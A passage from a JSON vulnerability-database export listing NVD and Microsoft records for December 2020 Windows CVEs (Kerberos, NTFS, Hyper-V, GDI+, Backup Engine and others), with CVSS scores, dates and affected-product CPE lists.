"cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-17140", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17140", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*"]}, {"lastseen": "2022-03-23T14:28:52", "description": "Kerberos Security Feature Bypass Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-16996", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16996"], "modified": "2021-03-03T21:13:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-16996", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16996", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:34:15", "description": "Windows Network Connections Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17092", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17092"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-17092", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17092", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:34:20", "description": "Windows Digital Media Receiver Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17097", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17097"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-17097", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17097", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:34:18", "description": "Windows NTFS Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17096", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17096"], "modified": "2021-03-04T18:26:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-17096", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17096", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:34:21", "description": "Windows GDI+ Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17098", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17098"], "modified": "2021-03-03T21:07:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:sp1", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-17098", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17098", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:sp1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*"]}, {"lastseen": "2022-03-23T14:34:18", "description": "Hyper-V Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17095", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17095"], "modified": "2021-03-03T21:09:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-17095", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17095", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*"]}], "mscve": [{"lastseen": "2022-03-17T17:50:47", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Backup Engine Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-16960", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16960", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T17:50:46", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16964. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Backup Engine Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-16963", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16963", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T17:50:47", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Backup Engine Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-16961", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16961", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T17:50:46", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, 